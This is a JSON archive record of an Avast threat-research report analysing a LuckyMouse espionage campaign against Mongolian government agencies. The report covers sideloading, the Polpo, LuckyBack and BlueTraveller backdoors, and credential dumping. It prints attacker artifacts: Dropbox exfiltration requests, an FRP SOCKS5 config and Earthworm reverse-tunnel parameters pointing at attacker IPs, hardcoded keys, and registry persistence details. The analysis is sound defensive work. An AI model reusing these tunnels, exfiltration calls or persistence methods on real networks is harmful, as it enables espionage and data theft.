{
	"id": "67590e56-9c0b-445f-b916-47fd3fff1ec7",
	"created_at": "2026-04-06T00:16:11.797598Z",
	"updated_at": "2026-04-10T03:36:06.524867Z",
	"deleted_at": null,
	"sha1_hash": "f369af064150cf306bb848bf041777e46e140849",
	"title": "APT group targeting governmental agencies in East Asia",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3181517,
	"plain_text": "APT group targeting governmental agencies in East Asia\r\nBy Threat Research Team\r\nArchived: 2026-04-05 12:53:12 UTC\r\nIntroduction\r\nThis summer, Avast discovered a new APT campaign targeting government agencies and a National Data Center\r\nof Mongolia. We consider with moderate confidence based on our research that the Chinese-speaking APT group\r\nLuckyMouse is behind the attack.\r\nThe APT group planted backdoors and keyloggers to gain long-term access to government networks and then\r\nuploaded a variety of tools that they used to perform additional activities on the compromised network such as\r\nscanning of the local network and dumping credentials. We presume that the main aim of cyber-espionage was the\r\nexfiltration of sensitive data from potentially interesting government agencies.\r\nAccording to our local telemetry, we consider that the government institutions were attacked in two ways. One\r\nwas through a vulnerable company that provides services for these agencies, and the other was through\r\nemail spear-phishing with a malicious attachment – a weaponized document using CVE-2017-11882.\r\nThere are many tactics that are consistent with other reports of LuckyMouse; nevertheless, we are also seeing\r\nsome previously undocumented tactics indicating that the actors have updated their toolset with the Polpo and\r\nLuckyBack backdoors. Our analysis below will highlight those new tactics.\r\nAttribution \u0026 Clusterization\r\nWe base our presumption that this campaign was led by the LuckyMouse APT group on the tooling that we found\r\nduring the investigation of this campaign, most of which has previously been attributed to LuckyMouse by\r\nother researchers[1][2][3].\r\nIn 2018, Kaspersky Labs released two blog posts about LuckyMouse targeting a national data center containing\r\nAsian government resources. 
Their blog posts described several tool sets such as the network filtering driver\r\nNDISProxy, weaponized documents with CVE-2017-11882 (Microsoft Office Equation Editor, widely used by\r\nChinese-speaking actors), and the Earthworm tunneler. They also described a DLL sideloading technique abusing\r\nlegitimate applications from Symantec (IntgStat.exe). This is a legitimate application that loads a DLL\r\npcalocalresloader.dll. By sideloading their own version of pcalocalresloader.dll, they load HyperBro RAT from a\r\ncompressed and encrypted file thumbs.db. While some of the tools that were used were publicly known tools that\r\nare available on the internet, the group also developed their own tools, including a rootkit[1][2].\r\nIn April 2019, PaloAlto Networks released a blog post about LuckyMouse. According to the post, the group\r\ninstalled webshells on a SharePoint server to compromise government organizations in the Middle East.\r\nSimilarly, the group used several publicly known and available tools (such as mimikatz, curl, nbtscan). But what\r\ngot our attention was the fact that the same HyperBro RAT was used in the campaign we were analyzing. The APT\r\nhttps://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/\r\nPage 1 of 15\n\nattack we analyzed also used a DLL sideloading technique, although with different executables. The executable\r\nused was a Symantec application thinprobe.exe that loads thinhostprobedll.dll. This DLL was then used to\r\nsideload thumb.db that contained encrypted and compressed HyperBro[3].\r\nWe’ve also discovered a Polpo backdoor in the network belonging to the National Data Center of Mongolia. This\r\nbackdoor was accompanied by samples that are known to be used by the LuckyMouse group, which led us to the\r\nconclusion that this backdoor is a new addition to LuckyMouse’s toolkit. We also observed more common tools,\r\ne.g. 
VMProtect-obfuscated Earthworm tunneler, a custom installer dropping the NDISProxy network filtering driver,\r\nand various network scanners.\r\nInfection Chain\r\nWe observed that this APT group was also targeting an unknown company that was providing services to\r\ngovernment institutions in East Asia. The group infiltrated the company’s computers and managed to harvest\r\ncredentials belonging to the company’s email accounts. Unfortunately, we haven’t been able to identify which\r\nattack vector was used in this infiltration. These credentials were then used to send emails from the hacked\r\ncompany’s email accounts to the government officials. While we were unable to recover the whole email, we’ve\r\nmanaged to recover the email’s header. The header indicates that these emails were asking the recipient to update\r\nfirmware, i.e. to launch a self-extracting 7-zip archive attached to this email.\r\nDate: Sun, 28 Jun 2020 20:43:08 +0800 (ULAT)\r\nSubject: Re: Perform a firmware update on the server\r\nXXXXXX_update.exe\r\n(sha256:2D2EA3002C367684F21AD08BDC9B5079EBDEE08B6356AC5694EFA139D4C6E60D)\r\nThis archive drops three already familiar files – Symantec’s thinprobe.exe, malicious thinhostprobedll.dll, and\r\nthumb.db. The malicious DLL is used for DLL sideloading, decrypting and decompressing thumb.db and finally\r\nloading its processed content – a HyperBro RAT. This backdoor has also been reported on by Kaspersky[1] and\r\nPaloAlto Networks[3], the latter providing an extensive description of the HyperBro RAT.\r\nFigure 1: Overview of infection vector\r\nToolset\r\nIn the following section we describe the tool set we found on the victim’s PC, used by the APT group for cyber-espionage and lateral movement through the network. 
We could divide these tools into three categories:\r\nHelpers: ServiceInstaller, ShellCodeExecutor, DataExtractor 1/2, Information Collector\r\nRemote access: StartServiceTool, Korplug, LuckyBack, BlueTraveller, Polpo\r\nPublicly available tools: UAC bypass tool, port scanners, password dumpers, FRP, Earthworm tunneler\r\nIn detail, we found the following tools:\r\nThis tool installs wcm.dll into %WINDIR%\\system32; a registry record\r\nHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\WindowsConnections Manager\r\nis created with the following values:\r\nDescription: Makes automatic connect/disconnect decisions based on the network connectivity options currently\r\navailable to the PC and enables management of network connectivity based on Group Policy settings.\r\nDisplayName: Windows Connections Manager\r\nServiceDll: C:\\Windows\\system32\\wcm.dll\r\nThis effectively creates a new service. The dropped binary is a 32-bit service DLL that has two parts – an embedded\r\nDLL, and mmLoader (http://tishion.github.io/mmLoader/), a loader that bypasses the Windows loader.\r\nThe final payload DLL is written in Go and contains a single export named “Interface“. This function expects 4\r\narguments consisting of two strings and their corresponding lengths. The string values specify the victim ID and\r\nthe Dropbox API key to use. The API key is passed in as an RC4-encrypted and base64-encoded value.\r\nThe hardcoded decryption key is “0000111122223333“. 
The DLL additionally contains a default API key which\r\nappears to be for the author’s test account.\r\nInitially, it tries to download a file from Dropbox via the HTTP API:\r\nPOST /2/files/download HTTP/1.1\r\nHost: content.dropboxapi.com\r\nUser-Agent: Go-http-client/1.1\r\nContent-Length: 0\r\nAuthorization: Bearer [snipped]\r\nDropbox-Api-Arg: {“path”: “/infos/000000.txt”}\r\nAccept-Encoding: gzip\r\nIf the server responds with a file, it tries to upload a file with a timestamp and a hostname onto Dropbox:\r\nPOST /2/files/upload HTTP/1.1\r\nHost: content.dropboxapi.com\r\nUser-Agent: Go-http-client/1.1\r\nContent-Length: 36\r\nAuthorization: Bearer [snipped]\r\nContent-Type: application/octet-stream\r\nDropbox-Api-Arg: {“path”: “/infos/116a0d.txt”,”mode”: “overwrite”,”autorename”: true,”mute”:\r\nfalse,”strict_conflict”: false}\r\nAccept-Encoding: gzip\r\n%currentDate% %currentTime%##%hostname%\r\nAfterwards, a C\u0026C request-response loop is started. Based on the response from the C\u0026C server, one of the\r\nfollowing commands is executed: download files, upload files, sleep, quit, or execute commands on a command\r\nline. See the following diagram for a detailed flow; keep in mind that all downloads/uploads use the\r\naforementioned Dropbox API:\r\nFigure 2: Overview of detailed execution flow\r\nServiceInstaller\r\nWe assume that this installer is intended to be executed by one of the aforementioned backdoors as it requires\r\ncommand-line parameters for its successful execution:\r\nAt first, the security descriptors of both %windir%\\system32\\ and %windir%\\system32\\drivers\\ are changed to allow the\r\ncurrent user to copy files to these locations. 
Then the installer copies a service executable to %windir%\\system32\\\r\nunder a randomly generated name (4 alphanumeric characters).\r\nDepending on whether a service named DFS Replication already exists in\r\nHKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost netsvcs,\r\na new service called DFS Replication (if it does not exist) or IAS Jet Database Access Service %number% is\r\ncreated. More specifically, its parameters are:\r\nDescription: “Configures Internet Authentication Service (IAS). If this service is stopped, the remote network\r\naccess that requires user authentication will be unavailable. If this service is disabled, any services that explicitly\r\ndepend on it will fail to start or (Retail) Replicates files among multiple PCs keeping them in sync. On Client, it is\r\nused to roam folders between PCs; on the server, it is used to provide high availability and local access across a\r\nwide area network (WAN). If the service is stopped, file replication does not occur, and the files on the server\r\nbecome out-of-date. If the service is disabled, any services that explicitly depend on it will not start.”\r\nDisplayName: DFS Replication/IAS Jet Database Access Service %number%\r\nServiceDll: C:\\Windows\\system32\\\u003c4 random alphanumeric characters\u003e.dll\r\nTag: 0\r\nSecurity: 0\r\nShellCodeExecutor\r\nThis utility takes hex-encoded shellcode as an argument and then proceeds to execute it. The code responsible for\r\ndecoding and unpacking can be seen below:\r\nFigure 3: Decoding algorithm and executing decoded payload in allocated memory\r\nWhile we weren’t able to reconstruct at which stage this executor was used, we were able to recover its parameter\r\nthat corresponds to a hex-encoded Metasploit-generated shellcode (reverse HTTP proxy – Github) configured to\r\nconnect to the URL oss.chrome-upgrade[.]com (202.59.9[.]58). 
We suspect that the threat actors used the shellcode\r\njust to retrieve and execute a further stage from the C\u0026C server.\r\nThis tool can be used to gather potentially sensitive documents with pdf, ppt, xls, and doc file extensions. It\r\nrecursively scans all connected drives for such documents that were modified in 2020 and later. Gathered\r\ndocuments are packed using WinRAR and the archive is protected with the password “zaq1xsw@cde3”. This archive\r\nis then saved to C:\\MSBuild\\NVIDIA\\ under the filename CRYPTO-%computerName%-%number_value%.SYS.\r\nThis scan is repeated every 20 minutes. If this tool is launched a second time (e.g. after reboot), only documents\r\nthat were modified in the last 24 hours are gathered.\r\nAfter each run, a file %windir%\\system32\\igfxme.vbs is executed. Since this tool did not contain any exfiltration-related functionality, we presume that this script is used to exfiltrate the archive from the computer to a C\u0026C.\r\nUnfortunately, we were not able to recover this script.\r\nThis binary is a simple file scanner that is provided with a list of file extensions, a list of directories, and date\r\nboundaries as parameters. Every directory from the list is searched for files with a given file extension. If such\r\nfiles are found and their modification date is within the provided date boundaries (in UTC), their full paths are\r\nwritten down into the output file. 
These paths are delimited by Windows line delimiters and they are encoded in\r\n16-bit Unicode.\r\nBelow is part of an error message, which tells us how this utility is used:\r\nT040ClientLite.exe suffix .txt,.xls scanDirs E:\\\\test,E:\\\\test1 output E:\\\\test\\\\output.txt startEditDate 2020/04/26\r\nendEditDate 2020/04/27\r\nMore generally, the command’s format is:\r\nT040ClientLite.exe suffix \u003cfile extensions\u003e scanDirs \u003cdirectories\u003e output \u003coutput file\u003e startEditDate \u003cdate\u003e\r\nendEditDate \u003cdate\u003e\r\nInformation Collector\r\nThe Information Collector focuses on removable drives. If no such drives are connected, its execution is\r\nterminated. The collector fingerprints those drives (serial number, vendor ID, product ID), encrypts this data with\r\na 64-byte XOR key, and stores it onto the system drive as hidden files. More specifically, it uses the following\r\ndirectories:\r\nC:\\MSBuild\\Resources\\Format\\S-1-1 (encrypted files)\r\nC:\\MSBuild\\Resources\\Format\\S-1-0\\S-1-0-0 (unencrypted temporary files, deleted after encryption)\r\nFigure 4: Sample enumerates drives, checking their type with GetDriveTypeA\r\nIt ensures its persistence by adding itself into the Run (SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run) registry\r\nkey under AvpSecurity.\r\nInterestingly, it contains many unused functions using command-line tools such as: systeminfo, arp, ipconfig,\r\nnetstat, and tasklist. It also supports archiving the collected information using WinRAR with a hard-coded\r\npassword “1qaz@WSX”. The sample has no networking capabilities. 
It primarily serves to collect\r\ninformation and transfer the gathered information using removable drives between the machines in the\r\nnetwork.\r\nMoreover, the particular sample we analyzed contained a bug in the drive enumeration routine that made it\r\nvirtually useless as it hampered all the sample’s functionality.\r\nRAT\r\nKorplug (PlugX)\r\nKorplug (PlugX) is a well-known Remote Access Trojan associated with Chinese-speaking attackers and it has\r\nbeen used in a large number of targeted attacks since 2012[4]. It uses DLL side-loading to load itself into\r\nmemory through legitimate applications. This helps it stay unnoticed by any security product. Korplug is a fully\r\nfeatured RAT, with capabilities such as file uploads, downloads, keystroke logging, webcam control and access to\r\na remote cmd.exe shell.\r\nIn our case, we observed that it was loaded through an application provided by ESET called unsecapp.exe that was\r\nsigned with a valid, but expired certificate. After executing unsecapp.exe, it loads a malicious DLL http_dll.dll.\r\nThis DLL, in turn, decrypts http_dll.dat with a custom algorithm, yielding Korplug which is then loaded into\r\nmemory and executed. Unfortunately, we were not able to trace the RAT back to the original payload that dropped\r\nand executed these files.\r\nAddresses of C\u0026C servers:\r\nweb[.]microlynconline[.]com:80\r\nhome[.]microlynconline[.]com:8000\r\nhelp[.]microlynconline[.]com:443\r\nhost[.]microlynconline[.]com:53\r\nBackdoors\r\nWe found three different backdoors in the government office network, two of which, Polpo and LuckyBack, were\r\nnever seen in any previous campaign. Polpo also hit the National Data Center, and the two others, BlueTraveller\r\nand LuckyBack, only hit the government office network.\r\nLuckyBack\r\nLuckyBack collects the computer’s fingerprint at first, and then tries to establish communication with the C\u0026C\r\nserver (45.77.55[.]145). 
Once the communication is established, the backdoor starts listening for commands. It is\r\ncapable of: starting a remote shell, file manipulation (move, read, write, execute, get file size), keylogging, and\r\nscreen capturing.\r\nTechnical:\r\nAt first, the used code page is retrieved by calling chcp, a command providing the keyboard and character set\r\ninformation, on the system drive.\r\nThe first request to the C\u0026C server “registers” the device by providing its fingerprint. Namely, the fingerprint is\r\nconstructed from: PID, Windows version/build number, CPU architecture, username, user privileges, hostname, IP\r\naddress, code page, and RDP session ID.\r\nIf the server accepts the registration, it responds with the PID and a simple string “OK”. Afterwards, a simple\r\nrequest-response C\u0026C loop is started, and commands and their corresponding numbers are displayed in the table\r\nbelow:\r\nBlueTraveller\r\nThis backdoor is simpler in terms of commands than the previous one. It accepts just four commands: exit, upload,\r\ndownload, and execute on the command line. Nevertheless, it uses two layers of C\u0026C servers, meaning that the\r\nfirst request goes to the first layer, and it yields an IP address of a C\u0026C server from the second layer. Afterwards, the\r\nrequest-response C\u0026C loop uses the second layer. If the backdoor receives a command for the command line, the\r\noutput from the console is encrypted with AES-256 and sent back to the second-layer C\u0026C server.\r\nThe binary itself has its strings encrypted with RC4, using a hardcoded key “L!Q@W#E$R%T^Y\u0026U*A|}t~k”.\r\nAmong these strings, we may find the address of the first-layer C\u0026C server and the user agent that should be used\r\nfor these requests. Our sample tried to contact http://go.vegispaceshop[.]org/shop.htm. 
The response seems to be\r\npretty inconspicuous at first glance. But once we have a closer look, we see that many lines are followed by\r\na mixture of tabs and spaces, which is rather fishy indeed. And surprisingly this is where the IP address of the\r\nsecond C\u0026C layer hides!\r\nFigure 5: Response from first layer of C\u0026C server\r\nFigure 6: Script which decrypts the white spaces from the html response\r\nBlueTraveller uses the same scheme for encryption – AES-256 with a key derived from a string that is hashed\r\nwith SHA-256, providing the IV and the key. The first usage of this encryption is in the first request to the second-layer C\u0026C. For this first request, the key is derived from the string “0304276cf4f31345“. The key is then used to\r\nencrypt the generated GUID and the computer’s hostname which are then Base64-encoded and used to generate\r\nthe request URL:\r\nhttp://\u003csecond_layer_C\u0026C\u003e/home/\u003crand number\u003e/\u003cenc_length\u003e/\u003cBase64 data\u003e.\r\nAfter this request is executed, commands are retrieved from:\r\nhttp://\u003csecond_layer_C\u0026C\u003e/index.htm.\r\nThe obtained data is encrypted with AES-256, using the aforementioned approach with the GUID as a base string for\r\nthe key-derivation procedure. Each response also contains the random number that was sent in the first second-layer request. The malware checks whether the received number matches the one it sent; in case of a mismatch,\r\nthe command is discarded. 
If a command for the command line is received, the output of the executed command\r\n(AES-256 encrypted, using the same key as the previous response, and Base64 encoded) is sent to\r\nhttp://\u003csecond_layer_C\u0026C\u003e/help/\u003crand number\u003e/\u003cenc_length\u003e/\u003cBase64 data\u003e.\r\nPolpo\r\nPolpo is a backdoor that we’ve been seeing in the wild since 2018. It supports around 15 different commands\r\nincluding information collection and exfiltration, file transfer, and proxy connections.\r\nBase64-encoded addresses of C\u0026C servers are hard-coded in the binary.\r\nPolpo – Communication\r\nThe backdoor mimics the HTTP protocol to blend in with normal traffic. The transferred data is encrypted with\r\nAES and encoded into Base64, then sent as a part of fake HTML content.\r\nFigure 7: Command data parsing\r\nThe AES encryption key is derived from the first packet of each new command received from the C\u0026C server,\r\nusing the algorithm below:\r\nFigure 8: Encryption key computation\r\nThe sample checks for a proxy configured on the system found in the Registry Key\r\nSoftware\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyEnable. If a proxy is configured, it uses the\r\nserver specified in Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyServer for all the\r\nconnections.\r\nPolpo – Functionality\r\nThere are more than 15 commands supported by the backdoor, although some of them are duplicates. Most of the\r\ncommands are executed in separate threads. Errors and inter-thread communication are handled using Events.\r\nFigure 9: Command dispatcher\r\nThese commands are supported by the version of Polpo we’ve analyzed:\r\nAn open-source UAC bypass tool (https://github.com/vestjoe/WinPwnage) was detected on several compromised\r\ndevices. 
It may be used to elevate privileges or achieve persistence on the system. We presume that it was used to\r\nexecute tasks and programs under administrator-level permissions.\r\nPort-scanners\r\nSeveral different port scanners were seen on compromised devices under various filenames. One of the used port\r\nscanners was the open-source https://github.com/kingron/s. We assume that in this case it was used for scanning the\r\nports of the server to find out which services were running.\r\nNbtscan\r\nNbtscan is a command-line NetBIOS scanner for Windows that scans for open NetBIOS name servers in the\r\nnetwork.\r\nPassword dumpers\r\nMimikatz and Lazagne were seen on the infected computers. We presume that they were used to retrieve\r\ncredentials from the compromised computers. We’ve also spotted a wrapped Mimikatz version, downloaded from\r\nhttps://github.com/jas502n/mimikat_ssp, on several compromised devices.\r\nFRP\r\nFast Reverse Proxy (FRP) is a tool that allows you to expose local services that are hidden behind NAT or a\r\nfirewall to the internet. Both raw TCP and UDP are supported as well as several other protocols whose\r\nrequests can be forwarded to the internal services via this proxy. We’ve recovered a configuration file 3bef4cd.tmp\r\nfor this proxy. 
The content of this configuration file is the following:\r\n[common]\r\nserver_addr = 202.59.9[.]58\r\nserver_port = 8443\r\nprivilege_token = %token%\r\n[SDJY_proxy]\r\ntype = tcp\r\nremote_port = 6001\r\nplugin = socks5\r\nIt is immediately obvious that the actor used the SOCKS5 plugin to route requests to the compromised network\r\nvia 202.59.9[.]58:8443.\r\nFigure 10: Diagram of FRP tool usage\r\nEarthworm tunneler\r\nThe Earthworm tunneler is considered to be a typical tool for Chinese-speaking actors by Kaspersky[1]. We’ve\r\nseen this tool on all compromised systems of the national data center. On one of these devices, we’ve managed to\r\nrecover the command-line parameters that were used: -s rssocks -d 139.180.155.133 -e 80. The tool itself creates a\r\nSOCKS tunnel to the provided server. It is publicly available at http://rootkiter.com/EarthWorm/.\r\nConclusions\r\nAs this blog post demonstrates, LuckyMouse has used new methods to infiltrate the government institution through\r\na third party’s system which they attacked.\r\nAvast has recently protected users in the government institution and national data center from further attacks using\r\nthe samples we analyzed. We also discovered an interesting encryption method that delivers a hidden IP address in\r\nthe whitespace of the C\u0026C response. 
We presume that the attackers updated their attack toolset in this\r\ncampaign after it was discovered by Avast.\r\nI would like to thank Adolf Středa, David Zimmer and Anh Ho for helping me with this research.\r\nIndicators of Compromise (IoC)\r\nRepository: https://github.com/avast/ioc/tree/master/\r\nList of SHA-256: https://github.com/avast/ioc/blob/master/\r\nMITRE ATT\u0026CK techniques\r\nSources\r\nSource: https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/"
	],
	"report_names": [
		"apt-group-targeting-governmental-agencies-in-east-asia"
	],
	"threat_actors": [
		{
			"id": "b740943a-da51-4133-855b-df29822531ea",
			"created_at": "2022-10-25T15:50:23.604126Z",
			"updated_at": "2026-04-10T02:00:05.259593Z",
			"deleted_at": null,
			"main_name": "Equation",
			"aliases": [
				"Equation"
			],
			"source_name": "MITRE:Equation",
			"tools": null,
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e3492534-85a6-4c87-a754-5ae4a56d7c8c",
			"created_at": "2022-10-25T15:50:23.819113Z",
			"updated_at": "2026-04-10T02:00:05.354598Z",
			"deleted_at": null,
			"main_name": "Threat Group-3390",
			"aliases": [
				"Threat Group-3390",
				"Earth Smilodon",
				"TG-3390",
				"Emissary Panda",
				"BRONZE UNION",
				"APT27",
				"Iron Tiger",
				"LuckyMouse",
				"Linen Typhoon"
			],
			"source_name": "MITRE:Threat Group-3390",
			"tools": [
				"Systeminfo",
				"gsecdump",
				"PlugX",
				"ASPXSpy",
				"Cobalt Strike",
				"Mimikatz",
				"Impacket",
				"gh0st RAT",
				"certutil",
				"China Chopper",
				"HTTPBrowser",
				"Tasklist",
				"netstat",
				"SysUpdate",
				"HyperBro",
				"ZxShell",
				"RCSession",
				"ipconfig",
				"Clambling",
				"pwdump",
				"NBTscan",
				"Pandora",
				"Windows Credential Editor"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "4ae78ca3-8bc8-4d67-9df1-a85df250a8a0",
			"created_at": "2024-10-08T02:00:04.469211Z",
			"updated_at": "2026-04-10T02:00:03.726781Z",
			"deleted_at": null,
			"main_name": "TaskMasters",
			"aliases": [
				"BlueTraveller"
			],
			"source_name": "MISPGALAXY:TaskMasters",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "5c13338b-eaed-429a-9437-f5015aa98276",
			"created_at": "2022-10-25T16:07:23.582715Z",
			"updated_at": "2026-04-10T02:00:04.675765Z",
			"deleted_at": null,
			"main_name": "Emissary Panda",
			"aliases": [
				"APT 27",
				"ATK 15",
				"Bronze Union",
				"Budworm",
				"Circle Typhoon",
				"Earth Smilodon",
				"Emissary Panda",
				"G0027",
				"Group 35",
				"Iron Taurus",
				"Iron Tiger",
				"Linen Typhoon",
				"LuckyMouse",
				"Operation DRBControl",
				"Operation Iron Tiger",
				"Operation PZChao",
				"Operation SpoiledLegacy",
				"Operation StealthyTrident",
				"Red Phoenix",
				"TEMP.Hippo",
				"TG-3390",
				"ZipToken"
			],
			"source_name": "ETDA:Emissary Panda",
			"tools": [
				"ASPXSpy",
				"ASPXTool",
				"Agent.dhwf",
				"AngryRebel",
				"Antak",
				"CHINACHOPPER",
				"China Chopper",
				"Destroy RAT",
				"DestroyRAT",
				"FOCUSFJORD",
				"Farfli",
				"Gh0st RAT",
				"Ghost RAT",
				"HTTPBrowser",
				"HTran",
				"HUC Packet Transmit Tool",
				"HighShell",
				"HttpBrowser RAT",
				"HttpDump",
				"HyperBro",
				"HyperSSL",
				"HyperShell",
				"Kaba",
				"Korplug",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Mimikatz",
				"Moudour",
				"Mydoor",
				"Nishang",
				"OwaAuth",
				"PCRat",
				"PlugX",
				"ProcDump",
				"PsExec",
				"RedDelta",
				"SEASHARPEE",
				"Sensocode",
				"SinoChopper",
				"Sogu",
				"SysUpdate",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Token Control",
				"TokenControl",
				"TwoFace",
				"WCE",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"Xamtrav",
				"ZXShell",
				"gsecdump",
				"luckyowa"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434571,
	"ts_updated_at": 1775792166,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f369af064150cf306bb848bf041777e46e140849.pdf",
		"text": "https://archive.orkl.eu/f369af064150cf306bb848bf041777e46e140849.txt",
		"img": "https://archive.orkl.eu/f369af064150cf306bb848bf041777e46e140849.jpg"
	}
}